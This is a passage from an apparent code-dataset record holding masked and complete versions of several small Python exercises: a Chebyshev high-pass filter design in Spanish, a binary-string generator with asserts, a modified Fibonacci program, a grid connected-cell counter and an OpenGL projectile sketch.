"step-3": "<mask token>\nplt.close('all')\nt0 = 0.0\ntf = 0.005\ndt = 5e-05\nt = np.arange(t0, tf, dt)\nf_t = 45 * 10 ** 3\nw_t = 2 * np.pi * f_t\nA_t = 0.2\ns_t = A_t * np.sin(w_t * t)\nf_r = 12 * 10 ** 3\nw_r = 2 * np.pi * f_r\nA_r = 2\nr_t = A_r * np.sin(w_r * t)\nsgnal = s_t + r_t\nR1 = 290\nC1 = 3.5e-09\nL1 = 0.0035\nk1 = 1\nR2 = 700\nC2 = 3.5e-09\nL2 = 0.00103\nk2 = 1\nalfa_max = 0.9\nalfa_min = 54\nwp_hp = w_t\nws_hp = w_r\nwp_hp_norm = wp_hp / wp_hp\nws_hp_norm = ws_hp / wp_hp\nw0 = np.sqrt(1 / (L1 * C1))\nwp_lp_norm = abs(-1 / wp_hp_norm)\nws_lp_norm = abs(-1 / ws_hp_norm)\neps = np.sqrt(10 ** (alfa_max / 10) - 1)\nN = np.arccosh(np.sqrt((10 ** (alfa_min / 10) - 1) / eps ** 2)) / np.arccosh(\n ws_lp_norm)\nN = np.ceil(N)\nden1_lp = [1, 0.29, 1]\nden2_lp = [1, 0.7, 0.29]\np1_lp = np.roots(den1_lp)\np2_lp = np.roots(den2_lp)\nmy_z_lp = np.array([])\nmy_p_lp = np.concatenate((p1_lp, p2_lp), axis=None)\nmy_k_lp = 1 * 0.29\nNUM, DEN = sig.zpk2tf(my_z_lp, my_p_lp, my_k_lp)\nNUM_lp, DEN_lp = sig.lp2lp(NUM, DEN, w0)\nmy_tf_lp = transf_f(NUM_lp, DEN_lp)\nNUM_hp, DEN_hp = sig.lp2hp(NUM, DEN, w0)\nmy_tf_hp = transf_f(NUM_hp, DEN_hp)\nmy_z_hp, my_p_hp, my_k_hp = sig.tf2zpk(NUM_hp, DEN_hp)\nt, s_filtrada, x = sig.lsim2(my_tf_hp, sgnal, t)\nfig1, axs = plt.subplots(4, 1)\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High Pass')\npzmap(my_tf_hp)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom scipy.signal import TransferFunction as transf_f\nimport scipy.signal as sig\nfrom splane import bodePlot, pzmap\nfrom matplotlib import pyplot as plt\nplt.close('all')\nt0 = 0.0\ntf = 0.005\ndt = 5e-05\nt = np.arange(t0, tf, dt)\nf_t = 45 * 10 ** 3\nw_t = 2 * np.pi * f_t\nA_t = 0.2\ns_t = A_t * np.sin(w_t * t)\nf_r = 12 * 10 ** 3\nw_r = 2 * np.pi * f_r\nA_r = 2\nr_t = A_r * np.sin(w_r * t)\nsgnal = s_t + r_t\nR1 = 290\nC1 = 3.5e-09\nL1 = 0.0035\nk1 = 1\nR2 = 700\nC2 = 3.5e-09\nL2 = 0.00103\nk2 = 1\nalfa_max = 0.9\nalfa_min = 54\nwp_hp = w_t\nws_hp = w_r\nwp_hp_norm = wp_hp / wp_hp\nws_hp_norm = ws_hp / wp_hp\nw0 = np.sqrt(1 / (L1 * C1))\nwp_lp_norm = abs(-1 / wp_hp_norm)\nws_lp_norm = abs(-1 / ws_hp_norm)\neps = np.sqrt(10 ** (alfa_max / 10) - 1)\nN = np.arccosh(np.sqrt((10 ** (alfa_min / 10) - 1) / eps ** 2)) / np.arccosh(\n ws_lp_norm)\nN = np.ceil(N)\nden1_lp = [1, 0.29, 1]\nden2_lp = [1, 0.7, 0.29]\np1_lp = np.roots(den1_lp)\np2_lp = np.roots(den2_lp)\nmy_z_lp = np.array([])\nmy_p_lp = np.concatenate((p1_lp, p2_lp), axis=None)\nmy_k_lp = 1 * 0.29\nNUM, DEN = sig.zpk2tf(my_z_lp, my_p_lp, my_k_lp)\nNUM_lp, DEN_lp = sig.lp2lp(NUM, DEN, w0)\nmy_tf_lp = transf_f(NUM_lp, DEN_lp)\nNUM_hp, DEN_hp = sig.lp2hp(NUM, DEN, w0)\nmy_tf_hp = transf_f(NUM_hp, DEN_hp)\nmy_z_hp, my_p_hp, my_k_hp = sig.tf2zpk(NUM_hp, DEN_hp)\nt, s_filtrada, x = sig.lsim2(my_tf_hp, sgnal, t)\nfig1, axs = plt.subplots(4, 1)\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High Pass')\npzmap(my_tf_hp)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 2 21:31:37 2020\r\n\r\n@author: Emmanuel Torres Molina\r\n\"\"\"\r\n\r\n\"\"\"\r\nEjercicio 10 del TP2 de Teoría de los Circuitos II:\r\nUn tono de 45 KHz y 200 mV de amplitud es distorsionada por un tono de 12 KHz \r\ny 2V de amplitud. Diseñar un filtro pasa altos que atenúe la señal\r\ninterferente, de tal forma que el remanente no sea mayor que el 2% de los 200 mV.\r\nLa ganancia en alta frecuencia deberá ser de 0 db y la máxima atenuación\r\nen la banda de paso menor a 1 dB. Emplear la aproximación que necesite menor \r\nnúmero de etapas.\r\nEn este caso el Filtro está Sintetizado por un Estructura RLC Pasiva + RL Pasivo.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.signal import TransferFunction as transf_f\r\nimport scipy.signal as sig\r\nfrom splane import bodePlot, pzmap\r\nfrom matplotlib import pyplot as plt\r\n\r\nplt.close ('all')\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Vector Tiempo:\r\nt0 = 0.0 # Tiempo Inicial\r\ntf = 0.005\r\ndt = 0.00005 # Incremento\r\nt = np.arange (t0, tf, dt)\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Tono de Interés:\r\n\r\nf_t = 45 * 10**3 # Frecuecia del Tono de mi Interés [Hz]\r\nw_t = 2 * np.pi * f_t # [rad/seg]\r\nA_t = 0.2 # Amplitud de mi Tono [V]\r\n\r\ns_t = A_t * np.sin ( w_t * t )\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Ruido Interferente:\r\n\r\nf_r = 12 * 10**3 # Frecuencia del Ruido Interferente [Hz]\r\nw_r = 2 * np.pi * f_r # [rad/seg]\r\nA_r= 2 # Amplitud del Ruido [V]\r\n\r\nr_t = A_r * np.sin ( w_r * t )\r\n\r\nsgnal = s_t + r_t\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Valores de los Elementos del Circuito:\r\n \r\n# Etapa 1: RLC Pasivo\r\nR1 = 290\r\nC1 = 3.5e-9\r\nL1 = 3.5e-3\r\nk1 = 1\r\n\r\n# Etapa 2: RL Pasivo\r\nR2 = 700\r\nC2 = 3.5e-9\r\nL2 = 1.03e-3\r\nk2 = 1\r\n\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Diseño del Filtro: Vamos a Realizar un Filtro High-Pass:\r\n \r\n# Requisitos de Plantilla\r\nalfa_max = 0.9 # Piden que sea menor a 1dB\r\nalfa_min = 54 # el remanente no sea mayor que el 2% de los 200 mV\r\nwp_hp = w_t\r\nws_hp = w_r\r\n\r\n# Normalizo las Pulsaciones Angulares usando como norma: wp_hp\r\nwp_hp_norm = wp_hp / wp_hp\r\nws_hp_norm = ws_hp / wp_hp\r\n\r\nw0 = np.sqrt ( 1 / (L1*C1) )\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtro Prototipo Low-Pass: Transformación en Frecuencia: w_HP = -1 / w_LP\r\nwp_lp_norm = abs(-1 / wp_hp_norm)\r\nws_lp_norm = abs(-1 / ws_hp_norm)\r\n\r\n\r\n# Voy a Utilizar Aproximación de Chebyshev para Diseñal el Filtro:\r\n\r\neps = np.sqrt ( (10 **(alfa_max/10) ) - 1 )\r\n\r\n# Orden del Filtro\r\nN = np.arccosh ( np.sqrt ( (10**(alfa_min/10) - 1) / eps**2 ) ) / np.arccosh (ws_lp_norm)\r\nN = np.ceil ( N ) # Redondeo para arriba\r\n\r\nden1_lp = [1, 0.29, 1]\r\nden2_lp = [1, 0.7, 0.29]\r\n\r\np1_lp = np.roots ( den1_lp )\r\np2_lp = np.roots ( den2_lp )\r\n\r\nmy_z_lp = np.array ([])\r\nmy_p_lp = np.concatenate ( (p1_lp, p2_lp), axis = None )\r\nmy_k_lp = 1 * 0.29\r\n\r\nNUM, DEN = sig.zpk2tf ( my_z_lp, my_p_lp, my_k_lp )\r\nNUM_lp, DEN_lp = sig.lp2lp ( NUM, DEN, w0 )\r\n\r\nmy_tf_lp = transf_f (NUM_lp,DEN_lp)\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtro Destino - Filtro High-Pass:\r\n \r\n# Calculo W0:\r\n\r\nNUM_hp, DEN_hp = sig.lp2hp ( NUM, DEN, w0 )\r\n\r\nmy_tf_hp = transf_f ( NUM_hp, DEN_hp )\r\n\r\nmy_z_hp, my_p_hp, my_k_hp = sig.tf2zpk (NUM_hp, DEN_hp )\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtrado de la Señal:\r\n \r\nt, s_filtrada, x = sig.lsim2 ((my_tf_hp), sgnal, t )\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Ploteo de las Señales, Respuesta en Frecuencia, etc.\r\n\r\nfig1, axs = plt.subplots(4,1)\r\n\r\naxs[0].plot ( t, s_t )\r\naxs[0].grid ('True')\r\naxs[0].set_title ('Señal Original')\r\naxs[0].set_ylim(-0.2,0.2)\r\naxs[0].set_ylabel('[V]')\r\n\r\naxs[1].plot ( t, r_t )\r\naxs[1].grid ('True')\r\naxs[1].set_title ('Ruido Interferente')\r\naxs[1].set_ylabel('[V]')\r\naxs[1].set_xlim(0)\r\n\r\naxs[2].plot (t, s_t + r_t )\r\naxs[2].grid ('True')\r\naxs[2].set_title ('Señal a Filtrar')\r\naxs[2].set_ylabel('[V]')\r\naxs[2].set_xlim(0)\r\n\r\naxs[3].plot (t, s_filtrada )\r\naxs[3].grid ('True')\r\naxs[3].set_title ( 'Señal Filtrada' )\r\naxs[3].set_xlabel ('t[seg]')\r\naxs[3].set_ylabel('[V]')\r\naxs[3].set_ylim(-0.2,0.2)\r\naxs[3].set_xlim(0)\r\n\r\n# Respuesta en Frecuencia:\r\nbodePlot (my_tf_lp, 'Filtro Prototipo - Low Pass')\r\npzmap (my_tf_lp)\r\n\r\nbodePlot (my_tf_hp, 'Filtro Destino - High Pass')\r\npzmap (my_tf_hp)\r\n\r\n\r\n\r\n\r\n\r\n \r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
<|reserved_special_token_1|>
import itertools
def zbits(n, k):
zeros = '0' * k
ones = '1' * (n - k)
binary = ones + zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return string
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
<|reserved_special_token_1|>
import itertools
def zbits(n,k):
zeros = "0" * k
ones = "1" * (n-k)
binary = ones+zeros
string = {''.join(i) for i in itertools.permutations(binary, n)}
return(string)
assert zbits(4, 3) == {'0100', '0001', '0010', '1000'}
assert zbits(4, 1) == {'0111', '1011', '1101', '1110'}
assert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}
|
flexible
|
{
"blob_id": "a8d13c3fbf6051eba392bcdd6dcb3e946696585f",
"index": 9065,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}\n",
"step-4": "import itertools\n\n\ndef zbits(n, k):\n zeros = '0' * k\n ones = '1' * (n - k)\n binary = ones + zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return string\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}\n",
"step-5": "import itertools \n\ndef zbits(n,k):\n zeros = \"0\" * k\n ones = \"1\" * (n-k)\n binary = ones+zeros\n string = {''.join(i) for i in itertools.permutations(binary, n)}\n return(string)\n\n\nassert zbits(4, 3) == {'0100', '0001', '0010', '1000'}\nassert zbits(4, 1) == {'0111', '1011', '1101', '1110'}\nassert zbits(5, 4) == {'00001', '00100', '01000', '10000', '00010'}",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/bin/python3
import sys
def fibonacciModified(t1, t2, n):
ti = t1
ti_1 = t2
for i in range (2, n):
ti_2 = ti + ti_1**2
ti = ti_1
ti_1 = ti_2
return ti_2
if __name__ == "__main__":
t1, t2, n = input().strip().split(' ')
t1, t2, n = [int(t1), int(t2), int(n)]
result = fibonacciModified(t1, t2, n)
print(result)
|
normal
|
{
"blob_id": "3838df627318b25767738da912f44e494cef40f3",
"index": 6833,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n",
"step-4": "import sys\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n",
"step-5": "#!/bin/python3\n\nimport sys\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range (2, n):\n ti_2 = ti + ti_1**2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\nif __name__ == \"__main__\":\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
<|reserved_special_token_0|>
print('result = ', result)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
n = 2
m = 2
matrix = [[1] * n] * m
result = connectedCell(matrix, n, m)
print('result = ', result)
<|reserved_special_token_1|>
import sys
from collections import deque
def connectedCell(matrix, n, m):
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
nodes = deque([(i, j)])
while nodes:
i_ind, j_ind = nodes.pop()
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind
]:
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind - 1, j_ind - 1), (i_ind -
1, j_ind), (i_ind - 1, j_ind + 1), (i_ind,
j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,
j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,
j_ind + 1)]
nodes.extend(nodes_list)
if count > path:
path = count
return path
n = 2
m = 2
matrix = [[1] * n] * m
result = connectedCell(matrix, n, m)
print('result = ', result)
<|reserved_special_token_1|>
#!/bin/python3
import sys
from collections import deque
def connectedCell(matrix,n,m):
# Complete this function
visit = []
for j in range(n):
a = []
for i in range(m):
a.append(True)
visit.append(a)
#print(visit)
path = 0
for i in range(n):
for j in range(m):
if visit[i][j]:
count = 0
#visit[i_ind][j_ind] =
nodes = deque([(i,j)])
while nodes:
i_ind, j_ind = nodes.pop()
#visit[i_ind][j_ind] = False
#print(i_ind,j_ind )
if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind]:
#print(i_ind, j_ind)
visit[i_ind][j_ind] = False
if matrix[i_ind][j_ind] == 1:
count += 1
nodes_list = [(i_ind -1, j_ind-1),
(i_ind -1, j_ind),
(i_ind -1, j_ind+1),
(i_ind, j_ind-1),
(i_ind, j_ind+1),
(i_ind +1, j_ind-1),
(i_ind +1, j_ind),
(i_ind +1, j_ind+1)]
#print(*nodes_list)
nodes.extend(nodes_list)
if count > path:
path = count
return path
# if __name__ == "__main__":
# n = int(input().strip())
# m = int(input().strip())
# matrix = []
# for matrix_i in range(n):
# matrix_t = [int(matrix_temp) for matrix_temp in input().strip().split(' ')]
# matrix.append(matrix_t)
# result = connectedCell(matrix,n,m)
# print(result)
n = 2
m = 2
matrix = [[1]*n]*m
result = connectedCell(matrix,n,m)
print('result = ',result)
|
flexible
|
{
"blob_id": "25a159ca2abf0176135086324ab355d6f5d9fe9e",
"index": 5054,
"step-1": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\n<mask token>\nprint('result = ', result)\n",
"step-3": "<mask token>\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\nn = 2\nm = 2\nmatrix = [[1] * n] * m\nresult = connectedCell(matrix, n, m)\nprint('result = ', result)\n",
"step-4": "import sys\nfrom collections import deque\n\n\ndef connectedCell(matrix, n, m):\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n nodes = deque([(i, j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind\n ]:\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind - 1, j_ind - 1), (i_ind - \n 1, j_ind), (i_ind - 1, j_ind + 1), (i_ind, \n j_ind - 1), (i_ind, j_ind + 1), (i_ind + 1,\n j_ind - 1), (i_ind + 1, j_ind), (i_ind + 1,\n j_ind + 1)]\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n\n\nn = 2\nm = 2\nmatrix = [[1] * n] * m\nresult = connectedCell(matrix, n, m)\nprint('result = ', result)\n",
"step-5": "#!/bin/python3\n\nimport sys\nfrom collections import deque\n\ndef connectedCell(matrix,n,m):\n # Complete this function\n visit = []\n for j in range(n):\n a = []\n for i in range(m):\n a.append(True)\n visit.append(a)\n #print(visit)\n path = 0\n for i in range(n):\n for j in range(m):\n if visit[i][j]:\n count = 0\n #visit[i_ind][j_ind] = \n nodes = deque([(i,j)])\n while nodes:\n i_ind, j_ind = nodes.pop()\n #visit[i_ind][j_ind] = False\n #print(i_ind,j_ind )\n if 0 <= i_ind < n and 0 <= j_ind < m and visit[i_ind][j_ind]:\n #print(i_ind, j_ind)\n visit[i_ind][j_ind] = False\n if matrix[i_ind][j_ind] == 1:\n count += 1\n nodes_list = [(i_ind -1, j_ind-1),\n (i_ind -1, j_ind),\n (i_ind -1, j_ind+1), \n (i_ind, j_ind-1),\n (i_ind, j_ind+1),\n (i_ind +1, j_ind-1),\n (i_ind +1, j_ind),\n (i_ind +1, j_ind+1)]\n #print(*nodes_list)\n nodes.extend(nodes_list)\n if count > path:\n path = count\n return path\n \n \n \n \n\n# if __name__ == \"__main__\":\n# n = int(input().strip())\n# m = int(input().strip())\n# matrix = []\n# for matrix_i in range(n):\n# matrix_t = [int(matrix_temp) for matrix_temp in input().strip().split(' ')]\n# matrix.append(matrix_t)\n# result = connectedCell(matrix,n,m)\n# print(result)\nn = 2\nm = 2\nmatrix = [[1]*n]*m\nresult = connectedCell(matrix,n,m)\nprint('result = ',result)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi/180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin((theta)) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
|
normal
|
{
"blob_id": "d85c0929b22f57367c0e707bac78e56027113417",
"index": 4539,
"step-1": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\n<mask token>\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 